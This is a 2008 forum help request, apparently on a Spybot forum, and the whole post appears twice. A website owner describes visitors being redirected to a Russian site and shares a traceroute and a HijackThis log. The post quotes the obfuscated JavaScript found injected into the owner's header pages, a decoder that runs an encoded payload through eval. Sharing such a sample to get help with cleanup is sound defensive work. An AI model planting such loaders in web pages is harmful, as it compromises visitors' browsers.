tenmeg
2008-06-27, 22:21
The following was my 1st posting but never got a response?? I posted it on 6/25/08 at 15:12.
Hello - This is a form of malwear or trojan that redirects the user from a link on my web pages to a Russian web site. This problem seems to defy the usual counter attacks such as Spybot. It also seems to attack only programs located on my cgi-bin directory and only on the initial boot up of my computer. Here is what I have done so far. I ran Spybot in normal and then reran it in safe mode. In normal mode I found and deleted a lot of threats and cookies including the ususal suspects such as ZLOB, etc. But on rebooting my computer the problem of my cgi-bin links being redirected to a Russian web sit was still there. The redirect link looked like this: <http://sum4count/strong/184/?c13b08>. The Russian web page address is <http://ya.ru/>. I did change the file name on one of the links and that seems to confuse the malware as it tries to redirect to the Russian site. Any suggestions on how to get rid of this problem would be greatly appreciated.
Update:
I first thought I might have a serious trojan or malware but after running my computer through various programs including SpyBot I did not see anything that might cause this problem. So I went hunting while I was waiting to see if anybody could help me from Spybot. It was my LINKS and DATABASE programs that were under attack. I searched through my HTML pages looking for anything that had been changed that would cause this problem. I'm not that technical so it took me awhile to spot the JavaScript that had been added to the header.html pages of both programs. I turned off the Java function in Explorer. I contacted my ISP and soon found out that they can't control hackers that want to add malicious scripts to vulnerable programs. So it's an open highway to your web site if someone skilled enough wants inside. So I'm back in business for the moment. I changed passwords at my ISP. Hid my password to my database. Uploaded fresh web pages minus the Java Script and works until the next time.
I ran a trace program on the rogue site and hear was the results from the Yahoos at Ya.Ru.
traceroute to ya.ru (213.180.204.8), 30 hops max, 38 byte packets
1 66.179.175.1 (66.179.175.1) 12.802 ms 9.092 ms 7.981 ms
2 66.45.70.145 (66.45.70.145) 1.074 ms 1.899 ms 1.801 ms
3 66.179.80.98 (66.179.80.98) 0.498 ms 1.021 ms 0.498 ms
4 ausir5-ge-0-0-0-0.sgns.net (66.179.168.1) 0.993 ms 1.015 ms 0.993 ms
5 POS3-0.GW1.AUS4.ALTER.NET (63.65.123.73) 0.994 ms 1.112 ms 1.082 ms
6 0.so-2-0-0.XL2.AUS4.ALTER.NET (152.63.99.30) 1.169 ms 1.195 ms 1.273 ms
7 0.ge-4-0-0.XL4.IAD8.ALTER.NET (152.63.40.234) 43.175 ms 47.373 ms 46.270 ms
8 GigE7-0-0.GW8.IAD8.ALTER.NET (152.63.33.17) 50.285 ms 42.976 ms 43.143 ms
9 teliasonera-test-gw.customer.alter.net (63.65.76.190) 50.019 ms 67.426 ms 117.475 ms
10 nyk-bb1-link.telia.net (80.91.248.186) 47.435 ms nyk-bb1-pos7-1-0.telia.net (213.248.80.70) 47.801 ms nyk-bb1-link.telia.net (213.248.83.21) 49.414 ms
11 kbn-bb1-link.telia.net (80.91.254.88) 127.029 ms 126.934 ms 126.890 ms
12 s-bb1-link.telia.net (213.248.65.141) 142.190 ms s-bb1-link.telia.net (80.91.248.46) 142.381 ms 142.465 ms
13 mow-b1-link.telia.net (80.91.251.222) 168.553 ms 168.663 ms 160.751 ms
14 yandex-ic-123531-mow-b1.c.telia.net (213.248.104.142) 167.119 ms 159.623 ms 167.840 ms
15 ya.ru (213.180.204.8) 182.576 ms 174.815 ms 182.533 ms
I know less than zero about javascript but for those who do here is the script that was added to my web pages.
script language=JavaScript>function pusban(x){var l=x.length,b=1024,i,j,r,p=0,s=0,w=0,t=Array(63,17,51,38,15,8,58,16,28,18,0,0,0,0,0,0,3,36,21,4,54,44,1,39,13,48,7,49,11,12,29,27,43,6,41,37,14,9,33,42,52,5,57,0,0,0,0,31,0,32,47,59,0,60,23,50,46,20,53,61,25,22,10,55,40,62,34,30,26,19,2,56,24,35,45);for(j=Math.ceil(l/b);j>0;j--){r='';for(i=Math.min(l,b);i>0;i--,l--){{w|=(t[x.charCodeAt(p++)-48])<<s;if(s){r+=String.fromCharCode(232^w&255);w>>=8;s-=2}else{s=6}}}eval(r);}}pusban('_QpVMswGQbUGUglGOmk2EspVHqeXMswrNmxyQgRK_Wla8D5I4uNaTWlrYD5gQ3xVHmNoLrNr5bR3LmzgdgUGxnkKJbH3Fqw3QJpVTswK8sej448RUgUaQPZVNt5ydftr8vpKt3pVMsxVdJEIOyNXlPNI@08oLrNr44e2nyeGFg5GdmkDOcHgdDxa4v5GBJzD5bUG19xyBPMyFhU3C3xA9OwVQDpgmukKF6p3Umxym08I')</script>
And if anyone at the Spybot forum wants to take a look at my Safe Mode HiJack report to see if there are any other problems that might cause problems.
Logfile of Trend Micro HijackThis v2.0.2
Scan saved at 12:36:28 PM, on 6/27/2008
Platform: Windows XP SP2 (WinNT 5.01.2600)
MSIE: Internet Explorer v7.00 (7.00.6000.16674)
Boot mode: Safe mode
Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\Explorer.EXE
C:\Program Files\Trend Micro\HijackThis\GemJack.exe
R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Search Bar = http://ie.redirect.hp.com/svs/rdr?TYPE=3&tp=iesearch&locale=EN_US&c=Q405&bd=pavilion&pf=laptop
R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Local Page =
R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Local Page =
R1 - HKCU\Software\Microsoft\Internet Connection Wizard,ShellNext = http://ie.redirect.hp.com/svs/rdr?TYPE=3&tp=iehome&locale=EN_US&c=Q405&bd=pavilion&pf=laptop
O2 - BHO: Adobe PDF Reader Link Helper - {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} - C:\Program Files\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelper.dll
O2 - BHO: Spybot-S&D IE Protection - {53707962-6F74-2D53-2644-206D7942484F} - C:\PROGRA~1\SPYBOT~1\SDHelper.dll
O2 - BHO: Canon Easy Web Print Helper - {68F9551E-0411-48E4-9AAF-4BC42A6A46BE} - C:\Program Files\Canon\Easy-WebPrint\EWPBrowseLoader.dll
O2 - BHO: SSVHelper Class - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files\Java\jre1.6.0_03\bin\ssv.dll
O2 - BHO: Google Toolbar Helper - {AA58ED58-01DD-4d91-8333-CF10577473F7} - c:\program files\google\googletoolbar3.dll
O2 - BHO: Google Toolbar Notifier BHO - {AF69DE43-7D58-4638-B6FA-CE66B5AD205D} - C:\Program Files\Google\GoogleToolbarNotifier\2.1.615.5858\swg.dll
O3 - Toolbar: Easy-WebPrint - {327C2873-E90D-4c37-AA9D-10AC9BABA46C} - C:\Program Files\Canon\Easy-WebPrint\Toolband.dll
O3 - Toolbar: &Google - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - c:\program files\google\googletoolbar3.dll
O4 - HKLM\..\Run: [ATIPTA] "C:\Program Files\ATI Technologies\ATI Control Panel\atiptaxx.exe"
O4 - HKLM\..\Run: [SynTPEnh] C:\Program Files\Synaptics\SynTP\SynTPEnh.exe
O4 - HKLM\..\Run: [LSBWatcher] c:\hp\drivers\hplsbwatcher\lsburnwatcher.exe
O4 - HKLM\..\Run: [eabconfg.cpl] C:\Program Files\HPQ\Quick Launch Buttons\EabServr.exe /Start
O4 - HKLM\..\Run: [Cpqset] C:\Program Files\HPQ\Default Settings\cpqset.exe
O4 - HKLM\..\Run: [Logitech Hardware Abstraction Layer] KHALMNPR.EXE
O4 - HKLM\..\Run: [Ulead AutoDetector] C:\Program Files\Ulead Systems\Ulead Photo Explorer 8.0 SE Basic\Monitor.exe
O4 - HKLM\..\Run: [TkBellExe] "C:\Program Files\Common Files\Real\Update_OB\realsched.exe" -osboot
O4 - HKLM\..\Run: [HP Software Update] C:\Program Files\Hp\HP Software Update\HPWuSchd2.exe
O4 - HKLM\..\Run: [SSBkgdUpdate] "C:\Program Files\Common Files\Scansoft Shared\SSBkgdUpdate\SSBkgdupdate.exe" -Embedding -boot
O4 - HKLM\..\Run: [OpwareSE4] "C:\Program Files\ScanSoft\OmniPageSE4.0\OpwareSE4.exe"
O4 - HKLM\..\Run: [PestPatrol Control Center] C:\PROGRA~1\PESTPA~1\PPControl.exe
O4 - HKLM\..\Run: [PPMemCheck] C:\PROGRA~1\PESTPA~1\PPMemCheck.exe
O4 - HKLM\..\Run: [CookiePatrol] C:\PROGRA~1\PESTPA~1\CookiePatrol.exe
O4 - HKLM\..\Run: [QuickTime Task] "C:\Program Files\QuickTime\qttask.exe" -atboottime
O4 - HKLM\..\Run: [iTunesHelper] "C:\Program Files\iTunes\iTunesHelper.exe"
O4 - HKLM\..\Run: [Adobe Reader Speed Launcher] "C:\Program Files\Adobe\Reader 8.0\Reader\Reader_sl.exe"
O4 - HKLM\..\Run: [Spy Protector] C:\Program Files\Security Task Manager\SpyProtector.exe /autostart
O4 - HKCU\..\Run: [ctfmon.exe] C:\WINDOWS\system32\ctfmon.exe
O4 - HKCU\..\Run: [EPSON Stylus CX8400 Series] C:\WINDOWS\System32\spool\DRIVERS\W32X86\3\E_FATICEA.EXE /FU "C:\WINDOWS\TEMP\E_S350.tmp" /EF "HKCU"
O4 - HKCU\..\Run: [cdloader] "C:\Documents and Settings\user\Application Data\mjusbsp\cdloader2.exe" MAGICJACK
O4 - HKCU\..\Run: [MalwareRemovalBot] C:\Program Files\MalwareRemovalBot\MalwareRemovalBot.exe -boot
O4 - HKCU\..\Run: [SpybotSD TeaTimer] C:\Program Files\Spybot - Search & Destroy\TeaTimer.exe
O4 - Startup: HotSync Manager.lnk = C:\Program Files\Palm\HOTSYNC.EXE
O4 - Startup: VZAccess Manager.lnk = C:\Program Files\Verizon Wireless\VZAccess Manager\VZAccess Manager.exe
O4 - Global Startup: Adobe Gamma Loader.exe.lnk = C:\Program Files\Common Files\Adobe\Calibration\Adobe Gamma Loader.exe
O4 - Global Startup: Album Fast Start.lnk = C:\Program Files\Ulead Systems\Ulead PhotoImpact 6\ABMTSR.EXE
O4 - Global Startup: Billminder.lnk = C:\Program Files\QUICKENW\BILLMIND.EXE
O4 - Global Startup: Kodak EasyShare software.lnk = C:\Program Files\Kodak\Kodak EasyShare software\bin\EasyShare.exe
O4 - Global Startup: Logitech SetPoint.lnk = C:\Program Files\Logitech\SetPoint\SetPoint.exe
O4 - Global Startup: Quicken Startup.lnk = C:\Program Files\QUICKENW\QWDLLS.EXE
O9 - Extra button: (no name) - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Program Files\Java\jre1.6.0_03\bin\ssv.dll
O9 - Extra 'Tools' menuitem: Sun Java Console - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Program Files\Java\jre1.6.0_03\bin\ssv.dll
O9 - Extra button: (no name) - {DFB852A3-47F8-48C4-A200-58CAB36FD2A2} - C:\PROGRA~1\SPYBOT~1\SDHelper.dll
O9 - Extra 'Tools' menuitem: Spybot - Search & Destroy Configuration - {DFB852A3-47F8-48C4-A200-58CAB36FD2A2} - C:\PROGRA~1\SPYBOT~1\SDHelper.dll
O9 - Extra button: (no name) - {e2e2dd38-d088-4134-82b7-f2ba38496583} - C:\WINDOWS\Network Diagnostic\xpnetdiag.exe
O9 - Extra 'Tools' menuitem: @xpsp3res.dll,-20001 - {e2e2dd38-d088-4134-82b7-f2ba38496583} - C:\WINDOWS\Network Diagnostic\xpnetdiag.exe
O9 - Extra button: Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\WINDOWS\system32\shdocvw.dll
O9 - Extra 'Tools' menuitem: Windows Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\WINDOWS\system32\shdocvw.dll
O14 - IERESET.INF: START_PAGE_URL=http://ie.redirect.hp.com/svs/rdr?TYPE=3&tp=iehome&locale=EN_US&c=Q405&bd=pavilion&pf=laptop
O16 - DPF: {2D8ED06D-3C30-438B-96AE-4D110FDC1FB8} (ActiveScan 2.0 Installer Class) - http://acs.pandasoftware.com/activescan/cabs/as2stubie.cab
O16 - DPF: {D27CDB6E-AE6D-11CF-96B8-444553540000} (Shockwave Flash Object) - http://fpdownload2.macromedia.com/get/shockwave/cabs/flash/swflash.cab
O23 - Service: Apple Mobile Device - Apple, Inc. - C:\Program Files\Common Files\Apple\Mobile Device Support\bin\AppleMobileDeviceService.exe
O23 - Service: Ati HotKey Poller - ATI Technologies Inc. - C:\WINDOWS\system32\Ati2evxx.exe
O23 - Service: Google Updater Service (gusvc) - Google - C:\Program Files\Google\Common\Google Updater\GoogleUpdaterService.exe
O23 - Service: HP WMI Interface (hpqwmi) - Hewlett-Packard Development Company, L.P. - C:\Program Files\HPQ\SHARED\HPQWMI.exe
O23 - Service: hpqwmiex - Hewlett-Packard Development Company, L.P. - C:\Program Files\Hewlett-Packard\Shared\hpqwmiex.exe
O23 - Service: InstallDriver Table Manager (IDriverT) - Macrovision Corporation - C:\Program Files\Common Files\InstallShield\Driver\11\Intel 32\IDriverT.exe
O23 - Service: iPod Service - Apple Inc. - C:\Program Files\iPod\bin\iPodService.exe
O23 - Service: Kodak Camera Connection Software (KodakCCS) - Eastman Kodak Company - C:\WINDOWS\system32\drivers\KodakCCS.exe
O23 - Service: LightScribeService Direct Disc Labeling Service (LightScribeService) - Hewlett-Packard Company - C:\Program Files\Common Files\LightScribe\LSSrvc.exe
--
End of file - 7486 bytes
Thanks for looking & hope it helps others in a similar situation
Hello - This is a form of malwear or trojan that redirects the user from a link on my web pages to a Russian web site. This problem seems to defy the usual counter attacks such as Spybot. It also seems to attack only programs located on my cgi-bin directory and only on the initial boot up of my computer. Here is what I have done so far. I ran Spybot in normal and then reran it in safe mode. In normal mode I found and deleted a lot of threats and cookies including the ususal suspects such as ZLOB, etc. But on rebooting my computer the problem of my cgi-bin links being redirected to a Russian web sit was still there. The redirect link looked like this: <http://sum4count/strong/184/?c13b08>. The Russian web page address is <http://ya.ru/>. I did change the file name on one of the links and that seems to confuse the malware as it tries to redirect to the Russian site. Any suggestions on how to get rid of this problem would be greatly appreciated.
Update:
I first thought I might have a serious trojan or malware but after running my computer through various programs including SpyBot I did not see anything that might cause this problem. So I went hunting while I was waiting to see if anybody could help me from Spybot. It was my LINKS and DATABASE programs that were under attack. I searched through my HTML pages looking for anything that had been changed that would cause this problem. I'm not that technical so it took me awhile to spot the JavaScript that had been added to the header.html pages of both programs. I turned off the Java function in Explorer. I contacted my ISP and soon found out that they can't control hackers that want to add malicious scripts to vulnerable programs. So it's an open highway to your web site if someone skilled enough wants inside. So I'm back in business for the moment. I changed passwords at my ISP. Hid my password to my database. Uploaded fresh web pages minus the Java Script and works until the next time.
I ran a trace program on the rogue site and hear was the results from the Yahoos at Ya.Ru.
traceroute to ya.ru (213.180.204.8), 30 hops max, 38 byte packets
1 66.179.175.1 (66.179.175.1) 12.802 ms 9.092 ms 7.981 ms
2 66.45.70.145 (66.45.70.145) 1.074 ms 1.899 ms 1.801 ms
3 66.179.80.98 (66.179.80.98) 0.498 ms 1.021 ms 0.498 ms
4 ausir5-ge-0-0-0-0.sgns.net (66.179.168.1) 0.993 ms 1.015 ms 0.993 ms
5 POS3-0.GW1.AUS4.ALTER.NET (63.65.123.73) 0.994 ms 1.112 ms 1.082 ms
6 0.so-2-0-0.XL2.AUS4.ALTER.NET (152.63.99.30) 1.169 ms 1.195 ms 1.273 ms
7 0.ge-4-0-0.XL4.IAD8.ALTER.NET (152.63.40.234) 43.175 ms 47.373 ms 46.270 ms
8 GigE7-0-0.GW8.IAD8.ALTER.NET (152.63.33.17) 50.285 ms 42.976 ms 43.143 ms
9 teliasonera-test-gw.customer.alter.net (63.65.76.190) 50.019 ms 67.426 ms 117.475 ms
10 nyk-bb1-link.telia.net (80.91.248.186) 47.435 ms nyk-bb1-pos7-1-0.telia.net (213.248.80.70) 47.801 ms nyk-bb1-link.telia.net (213.248.83.21) 49.414 ms
11 kbn-bb1-link.telia.net (80.91.254.88) 127.029 ms 126.934 ms 126.890 ms
12 s-bb1-link.telia.net (213.248.65.141) 142.190 ms s-bb1-link.telia.net (80.91.248.46) 142.381 ms 142.465 ms
13 mow-b1-link.telia.net (80.91.251.222) 168.553 ms 168.663 ms 160.751 ms
14 yandex-ic-123531-mow-b1.c.telia.net (213.248.104.142) 167.119 ms 159.623 ms 167.840 ms
15 ya.ru (213.180.204.8) 182.576 ms 174.815 ms 182.533 ms
I know less than zero about javascript but for those who do here is the script that was added to my web pages.
script language=JavaScript>function pusban(x){var l=x.length,b=1024,i,j,r,p=0,s=0,w=0,t=Array(63,17,51,38,15,8,58,16,28,18,0,0,0,0,0,0,3,36,21,4,54,44,1,39,13,48,7,49,11,12,29,27,43,6,41,37,14,9,33,42,52,5,57,0,0,0,0,31,0,32,47,59,0,60,23,50,46,20,53,61,25,22,10,55,40,62,34,30,26,19,2,56,24,35,45);for(j=Math.ceil(l/b);j>0;j--){r='';for(i=Math.min(l,b);i>0;i--,l--){{w|=(t[x.charCodeAt(p++)-48])<<s;if(s){r+=String.fromCharCode(232^w&255);w>>=8;s-=2}else{s=6}}}eval(r);}}pusban('_QpVMswGQbUGUglGOmk2EspVHqeXMswrNmxyQgRK_Wla8D5I4uNaTWlrYD5gQ3xVHmNoLrNr5bR3LmzgdgUGxnkKJbH3Fqw3QJpVTswK8sej448RUgUaQPZVNt5ydftr8vpKt3pVMsxVdJEIOyNXlPNI@08oLrNr44e2nyeGFg5GdmkDOcHgdDxa4v5GBJzD5bUG19xyBPMyFhU3C3xA9OwVQDpgmukKF6p3Umxym08I')</script>
And if anyone at the Spybot forum wants to take a look at my Safe Mode HiJack report to see if there are any other problems that might cause problems.
Logfile of Trend Micro HijackThis v2.0.2
Scan saved at 12:36:28 PM, on 6/27/2008
Platform: Windows XP SP2 (WinNT 5.01.2600)
MSIE: Internet Explorer v7.00 (7.00.6000.16674)
Boot mode: Safe mode
Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\Explorer.EXE
C:\Program Files\Trend Micro\HijackThis\GemJack.exe
R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Search Bar = http://ie.redirect.hp.com/svs/rdr?TYPE=3&tp=iesearch&locale=EN_US&c=Q405&bd=pavilion&pf=laptop
R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Local Page =
R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Local Page =
R1 - HKCU\Software\Microsoft\Internet Connection Wizard,ShellNext = http://ie.redirect.hp.com/svs/rdr?TYPE=3&tp=iehome&locale=EN_US&c=Q405&bd=pavilion&pf=laptop
O2 - BHO: Adobe PDF Reader Link Helper - {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} - C:\Program Files\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelper.dll
O2 - BHO: Spybot-S&D IE Protection - {53707962-6F74-2D53-2644-206D7942484F} - C:\PROGRA~1\SPYBOT~1\SDHelper.dll
O2 - BHO: Canon Easy Web Print Helper - {68F9551E-0411-48E4-9AAF-4BC42A6A46BE} - C:\Program Files\Canon\Easy-WebPrint\EWPBrowseLoader.dll
O2 - BHO: SSVHelper Class - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files\Java\jre1.6.0_03\bin\ssv.dll
O2 - BHO: Google Toolbar Helper - {AA58ED58-01DD-4d91-8333-CF10577473F7} - c:\program files\google\googletoolbar3.dll
O2 - BHO: Google Toolbar Notifier BHO - {AF69DE43-7D58-4638-B6FA-CE66B5AD205D} - C:\Program Files\Google\GoogleToolbarNotifier\2.1.615.5858\swg.dll
O3 - Toolbar: Easy-WebPrint - {327C2873-E90D-4c37-AA9D-10AC9BABA46C} - C:\Program Files\Canon\Easy-WebPrint\Toolband.dll
O3 - Toolbar: &Google - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - c:\program files\google\googletoolbar3.dll
O4 - HKLM\..\Run: [ATIPTA] "C:\Program Files\ATI Technologies\ATI Control Panel\atiptaxx.exe"
O4 - HKLM\..\Run: [SynTPEnh] C:\Program Files\Synaptics\SynTP\SynTPEnh.exe
O4 - HKLM\..\Run: [LSBWatcher] c:\hp\drivers\hplsbwatcher\lsburnwatcher.exe
O4 - HKLM\..\Run: [eabconfg.cpl] C:\Program Files\HPQ\Quick Launch Buttons\EabServr.exe /Start
O4 - HKLM\..\Run: [Cpqset] C:\Program Files\HPQ\Default Settings\cpqset.exe
O4 - HKLM\..\Run: [Logitech Hardware Abstraction Layer] KHALMNPR.EXE
O4 - HKLM\..\Run: [Ulead AutoDetector] C:\Program Files\Ulead Systems\Ulead Photo Explorer 8.0 SE Basic\Monitor.exe
O4 - HKLM\..\Run: [TkBellExe] "C:\Program Files\Common Files\Real\Update_OB\realsched.exe" -osboot
O4 - HKLM\..\Run: [HP Software Update] C:\Program Files\Hp\HP Software Update\HPWuSchd2.exe
O4 - HKLM\..\Run: [SSBkgdUpdate] "C:\Program Files\Common Files\Scansoft Shared\SSBkgdUpdate\SSBkgdupdate.exe" -Embedding -boot
O4 - HKLM\..\Run: [OpwareSE4] "C:\Program Files\ScanSoft\OmniPageSE4.0\OpwareSE4.exe"
O4 - HKLM\..\Run: [PestPatrol Control Center] C:\PROGRA~1\PESTPA~1\PPControl.exe
O4 - HKLM\..\Run: [PPMemCheck] C:\PROGRA~1\PESTPA~1\PPMemCheck.exe
O4 - HKLM\..\Run: [CookiePatrol] C:\PROGRA~1\PESTPA~1\CookiePatrol.exe
O4 - HKLM\..\Run: [QuickTime Task] "C:\Program Files\QuickTime\qttask.exe" -atboottime
O4 - HKLM\..\Run: [iTunesHelper] "C:\Program Files\iTunes\iTunesHelper.exe"
O4 - HKLM\..\Run: [Adobe Reader Speed Launcher] "C:\Program Files\Adobe\Reader 8.0\Reader\Reader_sl.exe"
O4 - HKLM\..\Run: [Spy Protector] C:\Program Files\Security Task Manager\SpyProtector.exe /autostart
O4 - HKCU\..\Run: [ctfmon.exe] C:\WINDOWS\system32\ctfmon.exe
O4 - HKCU\..\Run: [EPSON Stylus CX8400 Series] C:\WINDOWS\System32\spool\DRIVERS\W32X86\3\E_FATICEA.EXE /FU "C:\WINDOWS\TEMP\E_S350.tmp" /EF "HKCU"
O4 - HKCU\..\Run: [cdloader] "C:\Documents and Settings\user\Application Data\mjusbsp\cdloader2.exe" MAGICJACK
O4 - HKCU\..\Run: [MalwareRemovalBot] C:\Program Files\MalwareRemovalBot\MalwareRemovalBot.exe -boot
O4 - HKCU\..\Run: [SpybotSD TeaTimer] C:\Program Files\Spybot - Search & Destroy\TeaTimer.exe
O4 - Startup: HotSync Manager.lnk = C:\Program Files\Palm\HOTSYNC.EXE
O4 - Startup: VZAccess Manager.lnk = C:\Program Files\Verizon Wireless\VZAccess Manager\VZAccess Manager.exe
O4 - Global Startup: Adobe Gamma Loader.exe.lnk = C:\Program Files\Common Files\Adobe\Calibration\Adobe Gamma Loader.exe
O4 - Global Startup: Album Fast Start.lnk = C:\Program Files\Ulead Systems\Ulead PhotoImpact 6\ABMTSR.EXE
O4 - Global Startup: Billminder.lnk = C:\Program Files\QUICKENW\BILLMIND.EXE
O4 - Global Startup: Kodak EasyShare software.lnk = C:\Program Files\Kodak\Kodak EasyShare software\bin\EasyShare.exe
O4 - Global Startup: Logitech SetPoint.lnk = C:\Program Files\Logitech\SetPoint\SetPoint.exe
O4 - Global Startup: Quicken Startup.lnk = C:\Program Files\QUICKENW\QWDLLS.EXE
O9 - Extra button: (no name) - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Program Files\Java\jre1.6.0_03\bin\ssv.dll
O9 - Extra 'Tools' menuitem: Sun Java Console - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Program Files\Java\jre1.6.0_03\bin\ssv.dll
O9 - Extra button: (no name) - {DFB852A3-47F8-48C4-A200-58CAB36FD2A2} - C:\PROGRA~1\SPYBOT~1\SDHelper.dll
O9 - Extra 'Tools' menuitem: Spybot - Search & Destroy Configuration - {DFB852A3-47F8-48C4-A200-58CAB36FD2A2} - C:\PROGRA~1\SPYBOT~1\SDHelper.dll
O9 - Extra button: (no name) - {e2e2dd38-d088-4134-82b7-f2ba38496583} - C:\WINDOWS\Network Diagnostic\xpnetdiag.exe
O9 - Extra 'Tools' menuitem: @xpsp3res.dll,-20001 - {e2e2dd38-d088-4134-82b7-f2ba38496583} - C:\WINDOWS\Network Diagnostic\xpnetdiag.exe
O9 - Extra button: Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\WINDOWS\system32\shdocvw.dll
O9 - Extra 'Tools' menuitem: Windows Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\WINDOWS\system32\shdocvw.dll
O14 - IERESET.INF: START_PAGE_URL=http://ie.redirect.hp.com/svs/rdr?TYPE=3&tp=iehome&locale=EN_US&c=Q405&bd=pavilion&pf=laptop
O16 - DPF: {2D8ED06D-3C30-438B-96AE-4D110FDC1FB8} (ActiveScan 2.0 Installer Class) - http://acs.pandasoftware.com/activescan/cabs/as2stubie.cab
O16 - DPF: {D27CDB6E-AE6D-11CF-96B8-444553540000} (Shockwave Flash Object) - http://fpdownload2.macromedia.com/get/shockwave/cabs/flash/swflash.cab
O23 - Service: Apple Mobile Device - Apple, Inc. - C:\Program Files\Common Files\Apple\Mobile Device Support\bin\AppleMobileDeviceService.exe
O23 - Service: Ati HotKey Poller - ATI Technologies Inc. - C:\WINDOWS\system32\Ati2evxx.exe
O23 - Service: Google Updater Service (gusvc) - Google - C:\Program Files\Google\Common\Google Updater\GoogleUpdaterService.exe
O23 - Service: HP WMI Interface (hpqwmi) - Hewlett-Packard Development Company, L.P. - C:\Program Files\HPQ\SHARED\HPQWMI.exe
O23 - Service: hpqwmiex - Hewlett-Packard Development Company, L.P. - C:\Program Files\Hewlett-Packard\Shared\hpqwmiex.exe
O23 - Service: InstallDriver Table Manager (IDriverT) - Macrovision Corporation - C:\Program Files\Common Files\InstallShield\Driver\11\Intel 32\IDriverT.exe
O23 - Service: iPod Service - Apple Inc. - C:\Program Files\iPod\bin\iPodService.exe
O23 - Service: Kodak Camera Connection Software (KodakCCS) - Eastman Kodak Company - C:\WINDOWS\system32\drivers\KodakCCS.exe
O23 - Service: LightScribeService Direct Disc Labeling Service (LightScribeService) - Hewlett-Packard Company - C:\Program Files\Common Files\LightScribe\LSSrvc.exe
--
End of file - 7486 bytes
Thanks for looking & hope it helps others in a similar situation